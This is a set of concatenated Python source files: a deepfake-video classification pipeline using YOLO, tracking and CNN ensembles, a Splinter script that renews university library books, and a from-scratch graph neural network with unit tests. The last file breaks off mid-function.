    """Extract per-person crops from every video in a directory: YOLO detection
    on the first frame, then KCF tracking for subsequent sampled frames.
    Output layout: FaceCrops/<video>/Person<i>/Frame<j>.jpg
    """
    def __init__(self, video_directory, sample_rate):
        # Directory containing the input videos.
        self.video_directory = video_directory
        # Number of frames to sample (and crop) per video.
        self.sample_rate = sample_rate
    def face_crops(self):
        """Write person crops for every video; per-video errors are printed and skipped."""
        try:
            os.mkdir("FaceCrops")
        except Exception as e:
            print(e)
        videos = [f for f in listdir(self.video_directory) if isfile(join(self.video_directory, f))]
        yolo_object = YOLO()
        yolo_object.load_models()
        for v in videos:
            try:
                video_path = self.video_directory+"/"+v
                video_name = video_path.split("/")[-1].split(".")[0]
                os.mkdir("FaceCrops/" + video_name)
                print(video_name)
                vid = cv2.VideoCapture(video_path)
                # Detect people on the first frame only.
                ret, frame = vid.read()
                person_boxes = yolo_object.detect_video(frame)
                for i in range(0, len(person_boxes)):
                    os.mkdir("FaceCrops/" + video_name + "/" + "Person" + str(i + 1))
                person_no = 1
                for bbox in person_boxes:
                    # Boxes come back as [top, bottom, left, right]; convert to x, y, w, h.
                    x, y, w, h = int(bbox[2]), int(bbox[0]), int(bbox[3] - bbox[2]), int(bbox[1] - bbox[0])
                    img = frame[y:y + h, x:x + w]
                    cv2.imwrite("FaceCrops/" + video_name + "/" + "Person" + str(person_no) + "/" + "Frame0.jpg", img)
                    person_no += 1
                # Follow each detected person through the video with a KCF tracker.
                multiTracker = cv2.MultiTracker_create()
                for i in range(0, len(person_boxes)):
                    bbox = person_boxes[i]
                    x, y, w, h = int(bbox[2]), int(bbox[0]), int(bbox[3] - bbox[2]), int(bbox[1] - bbox[0])
                    bbox = [x, y, w, h]
                    multiTracker.add(cv2.TrackerKCF_create(), frame, tuple(bbox))
                frame_number = 1
                total_frames = 1
                while vid.isOpened():
                    # Sample roughly sample_rate frames evenly across the video.
                    skip_rate = vid.get(cv2.CAP_PROP_FRAME_COUNT)//self.sample_rate
                    ret, frame = vid.read()
                    if not ret:
                        break
                    ret, boxes = multiTracker.update(frame)
                    if total_frames == self.sample_rate:
                        break
                    if frame_number % skip_rate != 0:
                        frame_number += 1
                        continue
                    total_frames += 1
                    person_no = 1
                    for i, newbox in enumerate(boxes):
                        x, y, w, h = newbox
                        img = frame[int(y):int(y + h), int(x):int(x + w)]
                        cv2.imwrite("FaceCrops/" + video_name + "/" + "Person" + str(person_no) + "/" + "Frame" + str(frame_number) + ".jpg", img)
                        person_no += 1
                    # Allow an early Esc-key abort when a window is open.
                    if cv2.waitKey(1) & 0xFF == 27:
                        break
                    frame_number += 1
            except Exception as e:
                # Best effort: report and continue with the next video.
                print(e)
                pass
        cuda.close()
class Utils:
    """Image and tensor preparation helpers shared by the classifier runners."""
    def __init__(self, frames_per_video):
        # Number of frames sampled per video (first tensor dimension).
        self.frames_per_video = frames_per_video
        # Edge length used by generate_image_tensor.
        self.input_size = 150
        # Edge length used by generate_image_tensor2 (224x224 Keras models).
        self.input_size2 = 224
    """
    Function :- isotropically_resize_image
    Resize the face image as per the input size of the inception model.
    Input :
        img :- Face Crops generated from the main frame of the video.
        size :- Width/Height of the image. (Image is supposed to be a square)
    Returns :
        resized :- Resized image with it's higher dimension equal to size.
    """
    def isotropically_resize_image(self, img, size, resample=cv2.INTER_AREA):
        h, w = img.shape[:2]
        # Scale so the larger dimension equals `size`, preserving aspect ratio.
        if w > h:
            h = h * size // w
            w = size
        else:
            w = w * size // h
            h = size
        resized = cv2.resize(img, (w, h), interpolation=resample)
        return resized
    """
    Function :- make_square_image
    Add borders to the image in order to change the shape of image to a square.
    Input :
        img :- Resized face crops from the isotropically_resize_image function.
    Returns :
        square_image :- Square image with a border of height (size-h) and width (size-w).
    """
    def make_square_image(self, img):
        h, w = img.shape[:2]
        size = max(h, w)
        # Pad only the bottom/right with black to reach a square.
        t = 0
        b = size - h
        l = 0
        r = size - w
        return cv2.copyMakeBorder(img, t, b, l, r, cv2.BORDER_CONSTANT, value=0)
    """
    Function :- find_number_of_person
    Return the number of person id found after completion of detection and tracking algotihms.
    Input :
        video_face_path :- Path of the folder of a specific video where different person
                           ID are stored.
    Returns :
        arr :- Number of different people in the entire video.
    """
    def find_number_of_person(self, video_face_path):
        arr = os.listdir(video_face_path)
        return len(arr)
    def generate_image_tensor(self, video_face_path):
        """Build one (frames, 150, 150, 3) uint8 RGB tensor per person directory."""
        person_count = self.find_number_of_person(video_face_path)
        person_x = []
        for i in range(1,person_count+1):
            mypath = video_face_path + "/Person" + str(i)
            onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
            x = np.zeros((self.frames_per_video, self.input_size, self.input_size, 3), dtype=np.uint8)
            n = 0
            for f in onlyfiles:
                files = mypath + "/" + f
                img = cv2.imread(files)
                # cv2 reads BGR; convert to RGB before resizing/padding.
                frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
                resized_face = self.isotropically_resize_image(frame, self.input_size)
                resized_face = self.make_square_image(resized_face)
                x[n] = resized_face
                n += 1
            person_x.append(x)
        return person_x
    def generate_image_tensor2(self,video_face_path):
        """Build one (frames, 224, 224, 3) tensor per person, scaled to [0, 1]."""
        person_count = self.find_number_of_person(video_face_path)
        person_x = []
        for i in range(1, person_count+1):
            mypath = video_face_path + "/Person" + str(i)
            onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
            x = np.zeros((self.frames_per_video, self.input_size2, self.input_size2, 3), dtype=np.uint8)
            n = 0
            for f in onlyfiles:
                files = mypath + "/" + f
                img = image.load_img(files, target_size=(224, 224))
                img_tensor = image.img_to_array(img)
                img_tensor /= 255.
                x[n] = img_tensor
                n += 1
            person_x.append(x)
        return person_x
class results:
    """Evaluation and ensembling helpers. Ground-truth labels are encoded in
    dictionary keys as a trailing "_<label>" suffix (0 = real, 1 = fake)."""
    def find_best_threshold(self, probability_scores):
        """Sweep thresholds 0.0..1.0 in steps of 0.05 and print accuracy per step."""
        accuracy = []
        threshold = 0.0
        threshold_graph = []
        while threshold < 1:
            y_pred = []
            y_real = []
            for keys in probability_scores.keys():
                # Label is the integer suffix of the key.
                label = int(keys.split("_")[-1])
                y_real.append(label)
                if probability_scores[keys] > threshold:
                    y_pred.append(1)
                else:
                    y_pred.append(0)
            threshold_graph.append(threshold)
            accuracy.append(metrics.accuracy_score(y_real, y_pred))
            # NOTE(review): float accumulation — the last step may be ~0.9500000000000001.
            threshold = threshold + 0.05
        print((accuracy))
        print("+====================================================+")
        print((threshold_graph))
        print("+====================================================+")
    """
    Function :- generate_report
    This function is called in the after the predicted scores of every video in the directory has been
    generated. It is mainly used to generate confusion matrix, classification report and accuracy.
    Input :
        probability_scores :- Dictionary with video names as their keys and there predicted
                              probability score as the value of that specific key.
        threshold :- Real value in between 0 and 1. If probability is more than threshold, then
                     we will consider video as fake.
    Returns :
        probability_scores :- Dictionary with video names as their keys and there predicted
                              probability score as the value of that specific key.
    """
    def generate_report(self, probability_scores, threshold):
        y_real = []
        y_pred = []
        y_prob = []
        for keys in probability_scores.keys():
            label = int(keys.split("_")[-1])
            y_real.append(label)
            if probability_scores[keys] > threshold:
                y_pred.append(1)
            else:
                y_pred.append(0)
            y_prob.append(probability_scores[keys])
        print(metrics.confusion_matrix(y_real, y_pred))
        print(metrics.accuracy_score(y_real, y_pred))
        print(metrics.classification_report(y_real, y_pred))
        print("Log Loss value is :-", metrics.log_loss(y_real, y_prob))
    def ensemble(self,scores_resnext, scores_efficient):
        """Weighted average of two score dicts (0.6 ResNeXt + 0.4 EfficientNet)."""
        ensembled = {}
        for keys in scores_resnext.keys():
            ensembled[keys] = ((0.4 * scores_efficient[keys] + 0.6 * scores_resnext[keys]))
        return ensembled
    def ensemble3(self,scores_resnext, scores_xception, scores_efficient):
        """Weighted average of three score dicts (0.5/0.2/0.3 ResNeXt/Xception/EfficientNet)."""
        ensembled = {}
        for keys in scores_resnext.keys():
            ensembled[keys] = ((0.3 * scores_efficient[keys] + 0.2*scores_xception[keys] + 0.5 * scores_resnext[keys]))
        return ensembled
    def dump_json(self, file_name, dictionary):
        """Serialize *dictionary* to <file_name>.json."""
        with open(file_name+'.json', 'w') as fp:
            json.dump(dictionary, fp)
    def read_json(self,file_name):
        """Load and return the dict stored in <file_name>.json."""
        with open(file_name+".json") as f:
            scores1 = json.load(f)
        return scores1
class RunClassifier1:
def __init__(self, video_directory_path, frames_per_video):
self.utils = Utils(frames_per_video)
self.video_directory_path = video_directory_path
self.frames_per_video = frames_per_video
def load_model_Xception(self):
base_model = Xception(input_shape=(224, 224, 3),
weights='imagenet',
include_top=False,
pooling='avg')
for layer in base_model.layers:
layer.trainable = True
x = base_model.output
x = Dense(512)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
x = Dense(64)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
predictions = Dense(1, activation='sigmoid')(x)
model = Model(inputs=base_model.input, outputs=predictions)
model.compile(loss="binary_crossentropy", optimizer=optimizers.Adam(lr=0.001), metrics=['accuracy'])
model.load_weights("Xception_DeepFakeFull.h5")
test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)
return model,test_datagen
def load_model_efficient(self):
base_model = EfficientNetB5(weights='imagenet', include_top=False, input_shape=(224, 224, 3))
x = base_model.output
x = GlobalMaxPooling2D()(x)
x = Dense(512)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
x = Dense(64)(x)
x = Dropout(0.1)(x)
x = Activation('relu')(x)
predictions = Dense(1, activation='sigmoid')(x)
model = Model(inputs=base_model.input, outputs=predictions)
model.compile(loss="binary_crossentropy", optimizer=optimizers.Adam(lr=0.001), metrics=['accuracy'])
model.load_weights("EFB5DeepFakes.h5")
test_datagen = ImageDataGenerator(rescale=1./255)
return model,test_datagen
def load_efficient_attention(self):
print("MODEL LOADING..........")
in_lay = Input(shape=(224, 224, 3))
base_model = EfficientNetB6(
input_shape=(224, 224, 3),
weights='imagenet',
include_top=False
)
pt_depth = base_model.get_output_shape_at(0)[-1]
pt_features = base_model(in_lay)
bn_features = BatchNormalization()(pt_features)
# here we do an attention mechanism to turn pixels in the GAP on an off
attn_layer = Conv2D(64, kernel_size=(1, 1), padding='same', activation='relu')(Dropout(0.5)(bn_features))
attn_layer = Conv2D(16, kernel_size=(1, 1), padding='same', activation='relu')(attn_layer)
attn_layer = Conv2D(8, kernel_size=(1, 1), padding='same', activation='relu')(attn_layer)
attn_layer = Conv2D(1, kernel_size=(1, 1), padding='valid', activation='sigmoid')(attn_layer)
# fan it out to all of the channels
up_c2_w = np.ones((1, 1, 1, pt_depth))
up_c2 = Conv2D(pt_depth, kernel_size=(1, 1), padding='same',
activation='linear', use_bias=False, weights=[up_c2_w])
up_c2.trainable = False
attn_layer = up_c2(attn_layer)
mask_features = multiply([attn_layer, bn_features])
gap_features = GlobalAveragePooling2D()(mask_features)
gap_mask = GlobalAveragePooling2D()(attn_layer)
# to account for missing values from the attention model
gap = Lambda(lambda x: x[0] / x[1], name='RescaleGAP')([gap_features, gap_mask])
gap_dr = Dropout(0.25)(gap)
dr_steps = Dropout(0.25)(Dense(128, activation='relu')(gap_dr))
out_layer = Dense(1, activation='sigmoid')(dr_steps)
model = Model(inputs=[in_lay], outputs=[out_layer])
model.compile(loss="binary_crossentropy", optimizer=optimizers.Adam(lr=0.001), metrics=['accuracy'])
model.load_weights("EFB6withAttentionDeepFakes.h5")
model.summary()
test_datagen = ImageDataGenerator(rescale=1./255)
return model,test_datagen
    def predict(self):
        """Score every video folder under self.video_directory_path.

        Each video directory is assumed to contain one sub-directory of face
        crops per detected person -- TODO confirm against the crop generator.

        Returns:
            dict mapping video name -> highest per-person mean probability.
        """
        model, test_datagen = self.load_efficient_attention()
        print("Model has been loaded")
        arr = os.listdir(self.video_directory_path)
        probability_scores = {}
        for video in arr:
            start = time.time()
            val_set_dir = self.video_directory_path+"/"+video
            # One sub-directory per person found in the video.
            person_count = len(os.listdir(val_set_dir))
            test_generator = test_datagen.flow_from_directory(val_set_dir,
                                target_size=(224, 224),
                                batch_size=10, class_mode='binary',
                                color_mode='rgb', shuffle=False)
            test_generator.reset()
            # NOTE(review): steps uses floor division by the batch size, so up
            # to 9 trailing frames are never scored -- confirm this is intended.
            predictions = model.predict_generator(test_generator, steps=test_generator.samples//10)
            per_person = len(predictions)//person_count
            y_person = []
            for i in range(person_count):
                # Mean score over this person's contiguous block of frames.
                y_person.append(predictions[i*per_person:i*per_person + per_person].mean().item())
            # A video is as suspicious as its most suspicious person.
            probability_scores[video] = max(y_person)
            end = time.time()
            print(video, ":-", probability_scores[video], "Time Taken :-", end-start)
        return probability_scores
class RunResNext:
    """Score face-crop videos with a pretrained ResNeXt deepfake classifier.

    (The original docstring called this "Inception ResNet"; the checkpoint
    loaded is "resnext.pth" into MyResNeXt, so it is a ResNeXt model.)
    """
    def __init__(self, video_directory_path, frames_per_video):
        self.utils = Utils(frames_per_video)
        # ImageNet channel statistics used to normalise the face crops.
        self.mean = [0.485, 0.456, 0.406]
        self.std = [0.229, 0.224, 0.225]
        self.normalize_transform = Normalize(self.mean, self.std)
        self.model = self.load_model()
        self.video_directory_path = video_directory_path
        self.frames_per_video = frames_per_video

    def load_model(self):
        """Load the ResNeXt checkpoint onto the GPU and switch to eval mode.

        Returns:
            model: the loaded model instance, ready for inference.
        """
        checkpoint = torch.load("resnext.pth", map_location=gpu)
        model = MyResNeXt().to(gpu)
        model.load_state_dict(checkpoint)
        _ = model.eval()
        del checkpoint  # free the state-dict memory once it is applied
        return model

    def predict(self):
        """Predict a probability score for every video in the directory.

        Returns:
            probability_scores: dict with video names as keys and the maximum
            per-person mean sigmoid score as values.
        """
        arr = os.listdir(self.video_directory_path)
        probability_scores = {}
        for video in arr:
            video_path = self.video_directory_path+"/"+video
            face_tensor = self.utils.generate_image_tensor(video_path)
            y_person = []
            # BUG FIX (hygiene): the inner loop previously reused the outer
            # index name `i`, shadowing it; distinct names avoid confusion.
            for person_idx in range(len(face_tensor)):
                x = torch.tensor(face_tensor[person_idx], device=gpu).float()
                x = x.permute((0, 3, 1, 2))  # NHWC -> NCHW
                for frame_idx in range(len(x)):
                    x[frame_idx] = self.normalize_transform(x[frame_idx] / 255.)
                with torch.no_grad():
                    y_pred = self.model(x)
                y_pred = torch.sigmoid(y_pred.squeeze())
                y_person.append(y_pred[:self.frames_per_video].mean().item())
            # A video is as suspicious as its most suspicious person.
            probability_scores[video] = max(y_person)
            print(video, ":-", probability_scores[video])
        return probability_scores
if __name__ == "__main__":
    frames_per_video = 30
    Result = results()
    video_directory = "/media/kenil/Kenil/Users/Kenil/Downloads/Final_Project/test_videos"
    # Extract face crops from every test video once, up front.
    face_crop_object = GenerateFaceCrops(video_directory, frames_per_video)
    face_crop_object.face_crops()
    image_directory = "/media/kenil/Kenil/Users/Kenil/Downloads/Final_Project/Main/FaceCrops"
    resnext = RunResNext(image_directory, frames_per_video)
    scores1 = resnext.predict()
    # BUG FIX: a comma was missing between the two constructor arguments
    # (the original line did not even parse).
    EfficientNet = RunClassifier1(image_directory, frames_per_video)
    # NOTE: the redundant EfficientNet.load_efficient_attention() call was
    # removed -- predict() loads the model itself, so the extra call only
    # built and discarded a second copy of the network.
    scores2 = EfficientNet.predict()
    print("************************************************")
    print("ResNext Results")
    # Result.find_best_threshold(scores1)
    Result.generate_report(scores1, 0.6)
    print("************************************************")
    print("************************************************")
    print("EfficientNet Attention Results")
    # BUG FIX: 'scores4' was never defined; the attention-model scores are
    # in 'scores2'.
    Result.find_best_threshold(scores2)
    Result.generate_report(scores2, 0.5)
    print("************************************************")
    print("************************************************")
    print("EfficientNet Attention + ResNext Ensemble Results")
    ensembled = Result.ensemble(scores2, scores1)
    Result.find_best_threshold(ensembled)
    Result.generate_report(ensembled, 0.5)
    print("************************************************")
|
DMeechan/CompSci-Handybook | library-renew-books.py | <filename>library-renew-books.py
# Note: you need to add Chromedriver to your env var path:
# In fish that means running:
# set PATH $HOME/bin $PATH
import time
import datetime
from splinter import Browser
browser = Browser('chrome', headless=False)
def get_due_status():
    """Return the library catalogue's 'DUE dd-mm-yy' marker for today."""
    return 'DUE ' + datetime.datetime.today().strftime('%d-%m-%y')
def login():
    """Fill in the username, pause ~6 s for the human to type the password
    into the open browser window, then click 'Log in'.

    NOTE(review): the password field is filled with '' on purpose -- the
    sleep gives the user time to type it manually; confirm before changing.
    """
    YOUR_USERNAME = 'abcdefgh'
    browser.fill('username', YOUR_USERNAME)
    browser.fill('password', '')
    time.sleep(6)
    browser.find_by_value('Log in').click()
def sort_by_due_date():
    """Click the due-date column header so the soonest-due books come first."""
    sort_button = browser.find_by_xpath('//*[@id="checkout_form"]/a[1]')
    sort_button.click()
def renew():
    """Sort checkouts by due date, select and renew the first two, confirm."""
    sort_by_due_date()
    # Right now this only renews 2 library books.
    # TODO: get user input and renew X books, or detect how many are due
    # and renew all due books.
    browser.find_by_id('renew0').click()
    browser.find_by_id('renew1').click()
    renew_selected_button = browser.find_by_xpath('//*[@id="checkout_form"]/a[6]')
    renew_selected_button.click()
    confirmation_button = browser.find_by_value('YES')
    confirmation_button.click()
# Open the library account page, log in, and renew anything due today.
url = 'https://library.st-andrews.ac.uk/patroninfo~S5/'
browser.visit(url)
login()
due_status = get_due_status()
print('Checking items due on: ' + due_status)
if browser.is_text_present(due_status):
    renew()
else:
    print("Exiting: could not find any books due today :D")
mo-mo-666/simple-GNN-from-scratch | src/test_GNN.py | import unittest
import numpy as np
from GNN import BinarizationGNN
class TestBinarizationGNN(unittest.TestCase):
    """Unit tests for BinarizationGNN: defaults, aggregation, optimization."""
    def setUp(self):
        # Fix the seed so randomly initialised weights are reproducible.
        np.random.seed(0)
    def test_defaultparams(self):
        """Default hyper-parameters and the one-hot initial node feature."""
        feature_dim = 10
        gnn = BinarizationGNN(feature_dim)
        self.assertEqual(gnn.feature_dim, feature_dim)
        self.assertEqual(gnn.learning_rate, 0.0001)
        self.assertEqual(gnn.eps, 0.001)
        self.assertTrue(all((np.array(gnn.aggregate_weight.shape) == feature_dim).flatten()))
        self.assertEqual(gnn.aggregate_feature.shape[0], feature_dim)
        feature = np.copy(gnn.aggregate_feature)
        # Default feature vector is one-hot on the first component.
        feature_defalut = np.zeros(feature_dim)
        feature_defalut[0] = 1.
        self.assertTrue(all((feature == feature_defalut).flatten()))
    def test_aggregate(self):
        """Aggregation (readout) on a 3-node graph with a single edge 0-1."""
        feature_dim = 4
        aggregate_weight = np.ones((feature_dim, feature_dim))
        gnn = BinarizationGNN(feature_dim, aggregate_step=1, aggregate_weight=aggregate_weight)
        graph = np.zeros((3, 3), dtype=bool)
        graph[0, 1] = graph[1, 0] = 1
        headout = gnn._aggregate(graph)
        self.assertTrue(all((headout == 2).flatten()))
        feature_dim = 5
        # Identity weight: features propagate unchanged along edges.
        aggregate_weight = np.eye(feature_dim)
        gnn = BinarizationGNN(feature_dim, aggregate_step=2, aggregate_weight=aggregate_weight)
        headout = gnn._aggregate(graph)
        self.assertTrue(all((headout == np.array([2, 0, 0, 0, 0]).flatten())))
        # All-negative weight + ReLU zeroes every feature.
        aggregate_weight = - np.ones((feature_dim, feature_dim))
        gnn = BinarizationGNN(feature_dim, aggregate_step=2, aggregate_weight=aggregate_weight)
        headout = gnn._aggregate(graph)
        self.assertTrue(all((headout == 0).flatten()))
    def test_optimize(self):
        """Both optimizers should reduce the loss on a single training graph."""
        graphs = np.zeros((1, 10, 10), dtype=bool)
        graphs[0, 1, 0] = graphs[0, 0, 1] = 1
        graphs[0, 1, 5] = graphs[0, 5, 1] = 1
        graphs[0, 4, 7] = graphs[0, 7, 4] = 1
        graphs[0, 8, 1] = graphs[0, 1, 8] = 1
        graphs[0, 2, 7] = graphs[0, 7, 2] = 1
        graphs[0, 3, 4] = graphs[0, 4, 3] = 1
        labels = [1]
        gnn = BinarizationGNN(optimizer='SGD')
        init_loss = gnn._loss_one(graphs[0], labels[0])
        for _ in range(3000):
            gnn._optimize(graphs, labels)
        after_loss = gnn._loss_one(graphs[0], labels[0])
        self.assertTrue(init_loss > after_loss)
        gnn = BinarizationGNN(optimizer='momentum')
        init_loss = gnn._loss_one(graphs[0], labels[0])
        for _ in range(3000):
            gnn._optimize(graphs, labels)
        after_loss = gnn._loss_one(graphs[0], labels[0])
        self.assertTrue(init_loss > after_loss)
if __name__ == '__main__':
    # Allow running this test module directly: python test_GNN.py
    unittest.main()
|
mo-mo-666/simple-GNN-from-scratch | src/GNN.py | import numpy as np
class BinarizationGNN:
    """
    Graph Neural Network to classify graphs into two classes.

    parameters
    ----------
    feature_dim : int, optional (default = 8)
        Dimension of the feature vector attached to each graph node.
    learning_rate : float, optional (default = 0.0001)
        Learning rate.
    eps : float, optional (default = 0.001)
        Step size used when calculating the numerical gradient.
    optimizer : 'SGD' | 'momentum', optional (default = 'momentum')
        Optimizing algorithm. Possible values:
        - 'SGD' : Stochastic Gradient Descent.
        - 'momentum' : Momentum SGD.
    momentum : float, optional (default = 0.9)
        Used when optimizer == 'momentum'.
    batch_size : int, optional (default = 10)
        Batch size.
    epoch : int, optional (default = 10)
        Number of epochs per call to ``fit``.
    aggregate_step : int, optional (default = 2)
        Aggregation step T.
    aggregate_feature : np.ndarray(feature_dim,) or None (default = None)
        Initial feature vector used when aggregating.
        If None, default is np.array([1, 0, 0, 0, ...]).
    aggregate_weight : np.ndarray(feature_dim, feature_dim) or None (default = None)
        Initial weight W in aggregation.
        If None, it is created using aggregate_weight_param.
    aggregate_weight_param : dict (keys: 'mu', 'sigma') (default = {'mu': 0, 'sigma': 0.4})
        Used when aggregate_weight is None: W is initialized from a normal
        distribution with mean 'mu' and standard deviation 'sigma'.
        (Only read, never mutated, so the shared default dict is safe.)
    aggregate_activate_func : 'sigmoid' | 'relu' | 'swish' (default = 'relu')
        Activation function used when aggregating.
    feature_vect_each_weight : np.ndarray(feature_dim,) or None (default = None)
        Initial weight A used for the weighted sum of feature vectors.
    feature_vect_each_weight_param : dict (keys: 'mu', 'sigma') (default = {'mu': 0, 'sigma': 0.4})
        Used when feature_vect_each_weight is None (same scheme as W).
    feature_vect_add_weight : float (default = 0)
        Initial bias b added when calculating the score.
    """
    def __init__(self,
                feature_dim: int=8,
                learning_rate: float=0.0001,
                eps: float=0.001,
                optimizer :str='momentum',
                momentum: float=0.9,
                batch_size: int=10,
                epoch: int=10,
                aggregate_step: int=2,
                aggregate_feature: np.ndarray=None,
                aggregate_weight: np.ndarray=None,
                aggregate_weight_param: dict={'mu': 0, 'sigma': 0.4},
                aggregate_activate_func: str='relu',
                feature_vect_each_weight: np.ndarray=None,
                feature_vect_each_weight_param: dict={'mu': 0, 'sigma': 0.4},
                feature_vect_add_weight: float=0):
        self.feature_dim = feature_dim
        self.learning_rate = learning_rate
        self.eps = eps
        self.optimizer = optimizer
        self.momentum = momentum
        self.batch_size = batch_size
        self.epoch = epoch
        self.aggregate_step = aggregate_step
        if aggregate_feature is not None:
            self.aggregate_feature = np.copy(aggregate_feature)
        else:
            # Default initial node feature: one-hot on the first component.
            self.aggregate_feature = np.zeros(feature_dim, dtype=np.float32)
            self.aggregate_feature[0] = 1.
        self.aggregate_weight_param = aggregate_weight_param
        if aggregate_weight is not None:
            self.aggregate_weight = np.copy(aggregate_weight)
        else:
            self.aggregate_weight = (np.random.randn(self.feature_dim, self.feature_dim) * self.aggregate_weight_param['sigma'] + self.aggregate_weight_param['mu']).astype(np.float32)
        self.aggregate_activate_func = aggregate_activate_func
        self.feature_vect_each_weight_param = feature_vect_each_weight_param
        # BUG FIX: this previously tested `feature_vect_add_weight` (the
        # bias), so an explicitly supplied `feature_vect_each_weight` was
        # silently ignored whenever the bias was 0 (its default), and
        # `np.copy(None)` was produced whenever the bias was non-zero but
        # A was omitted.
        if feature_vect_each_weight is not None:
            self.feature_vect_each_weight = np.copy(feature_vect_each_weight)
        else:
            self.feature_vect_each_weight = (np.random.randn(self.feature_dim) * self.feature_vect_each_weight_param['sigma'] + self.feature_vect_each_weight_param['mu']).astype(np.float32)
        self.feature_vect_add_weight = feature_vect_add_weight
        # Current parameters [W, A, b] ...
        self.learning_params = [self.aggregate_weight, self.feature_vect_each_weight, self.feature_vect_add_weight]
        # ... and their latest update steps (velocity terms for momentum).
        self.aggregate_weight_d = 0
        self.feature_vect_each_weight_d = 0
        self.feature_vect_add_weight_d = 0
        self.learning_params_d = [self.aggregate_weight_d, self.feature_vect_each_weight_d, self.feature_vect_add_weight_d]

    def _aggregate(self, graph: np.ndarray, learning_params: list=None) -> np.ndarray:
        """
        Aggregate node features for `self.aggregate_step` steps and return
        the readout (head out).

        parameters
        ----------
        graph : np.ndarray
            Adjacency matrix of a single graph.
        learning_params : list, optional (default = None)
            Learning parameters [W, A, b].
            If None, default is self.learning_params.

        returns
        ----------
        head_out : np.ndarray(feature_dim,)
            Sum of the final feature vectors over all nodes.
        """
        graph = np.copy(graph).astype(np.float32)
        if learning_params is None:
            learning_params = self.learning_params
        weight = np.copy(learning_params[0])
        if self.aggregate_activate_func == 'sigmoid':
            # tanh-based form is numerically stable for large |x|.
            f = lambda X: (np.tanh(X / 2.) + 1.) / 2.
        elif self.aggregate_activate_func == 'relu':
            f = lambda X: np.maximum(X, 0)
        elif self.aggregate_activate_func == 'swish':
            f = lambda X: X * (np.tanh(X / 2.) + 1.) / 2.
        else:
            raise ValueError('unknown activation: {}'.format(self.aggregate_activate_func))
        n = graph.shape[0]
        # Every node starts from the same initial feature vector.
        X = np.tile(np.copy(self.aggregate_feature), (n, 1))
        for _ in range(self.aggregate_step):
            A = np.dot(graph, X)      # sum of neighbour features
            X = f(np.dot(A, weight))  # linear map + activation
        # READOUT: sum the node features into one graph-level vector.
        head_out = np.sum(X, axis=0)
        return head_out

    def _rawscore_one(self, graph: np.ndarray, learning_params: list=None) -> float:
        """
        Calculate the raw score s = A . h + b after the aggregation step.

        parameters
        ----------
        graph : np.ndarray
            Adjacency matrix of a single graph.
        learning_params : list, optional (default = None)
            Learning parameters [W, A, b]; defaults to self.learning_params.

        returns
        ----------
        s : float
            The value of the score.
        """
        if learning_params is None:
            learning_params = self.learning_params
        h = self._aggregate(graph, learning_params)
        feature_vect_each_weight, feature_vect_add_weight = learning_params[1:]
        s = np.dot(feature_vect_each_weight, h) + feature_vect_add_weight
        return s

    def _predict_one(self, graph: np.ndarray) -> bool:
        """Predict the label of a single graph: True iff its score is > 0."""
        s = self._rawscore_one(graph)
        return s > 0

    def _loss_one(self, graph: np.ndarray, label: bool, learning_params: list=None) -> float:
        """
        Calculate the binary cross-entropy loss of a single graph.

        parameters
        ----------
        graph : np.ndarray
            Adjacency matrix of a single graph.
        label : bool
            The correct answer label of the graph.
        learning_params : list, optional (default = None)
            Learning parameters [W, A, b]; defaults to self.learning_params.

        returns
        ----------
        loss : float
            label*log(1+e^-s) + (1-label)*log(1+e^s), always >= 0.
        """
        label = float(label)
        s = self._rawscore_one(graph, learning_params)
        # BUG FIX: the original hand-rolled overflow guard used `label * s`
        # for s <= -100, which has the wrong sign (log(1+e^-s) ~ -s there)
        # and produced *negative* losses. np.logaddexp(0, x) computes
        # log(1+e^x) stably for any x, removing the need for branches.
        loss = label * np.logaddexp(0., -s) + (1 - label) * np.logaddexp(0., s)
        return loss

    def loss(self, graphs: np.ndarray, labels: list) -> float:
        """
        Calculate the average loss over a collection of graphs.

        parameters
        ----------
        graphs : np.ndarray
            Collection of graphs (stacked adjacency matrices).
        labels : list
            The list of correct answer labels of the graphs.

        returns
        ----------
        loss : float
            The mean of the per-graph losses.
        """
        loss = 0
        n = len(labels)
        for graph, label in zip(graphs, labels):
            loss += self._loss_one(graph, label) / n
        return loss

    def _gradient_one(self, graph: np.ndarray, label: bool) -> list:
        """
        Numerical (forward-difference) gradient of the loss of one graph
        with respect to every learning parameter.

        parameters
        ----------
        graph : np.ndarray
            Adjacency matrix of a single graph.
        label : bool
            The correct answer label of the graph.

        returns
        ----------
        g_aggregate_weight : np.ndarray
            Gradient with respect to W.
        g_feature_vect_each_weight : np.ndarray
            Gradient with respect to A.
        g_feature_vect_add_weight : float
            Gradient with respect to b.
        """
        loss = self._loss_one(graph, label)
        aggregate_weight, feature_vect_each_weight, feature_vect_add_weight = self.learning_params
        # Perturb each entry of W by eps and measure the loss change.
        d1, d2 = aggregate_weight.shape
        g_aggregate_weight = np.zeros_like(aggregate_weight)
        for i in range(d1):
            for j in range(d2):
                plus = np.copy(aggregate_weight)
                plus[i, j] += self.eps
                learning_params = [plus, feature_vect_each_weight, feature_vect_add_weight]
                lossplus = self._loss_one(graph, label, learning_params)
                g_aggregate_weight[i, j] = (lossplus - loss) / self.eps
        # Same for each entry of A.
        d, = feature_vect_each_weight.shape
        g_feature_vect_each_weight = np.zeros_like(feature_vect_each_weight)
        for i in range(d):
            plus = np.copy(feature_vect_each_weight)
            plus[i] += self.eps
            learning_params = [aggregate_weight, plus, feature_vect_add_weight]
            lossplus = self._loss_one(graph, label, learning_params)
            g_feature_vect_each_weight[i] = (lossplus - loss) / self.eps
        # And for the scalar bias b.
        learning_params = [aggregate_weight, feature_vect_each_weight, feature_vect_add_weight + self.eps]
        lossplus = self._loss_one(graph, label, learning_params)
        g_feature_vect_add_weight = (lossplus - loss) / self.eps
        return g_aggregate_weight, g_feature_vect_each_weight, g_feature_vect_add_weight

    def _optimize(self, graphs: np.ndarray, labels: list):
        """
        Average the per-graph gradients over one mini-batch and take an
        optimizer step on the learning parameters.

        parameters
        ----------
        graphs : np.ndarray
            Collection of graphs (the mini-batch).
        labels : list
            The list of correct answer labels of the graphs.
        """
        n = graphs.shape[0]
        delta_aggregate = 0
        delta_feature_vect_each = 0
        delta_feature_vect_add = 0
        for graph, label in zip(graphs, labels):
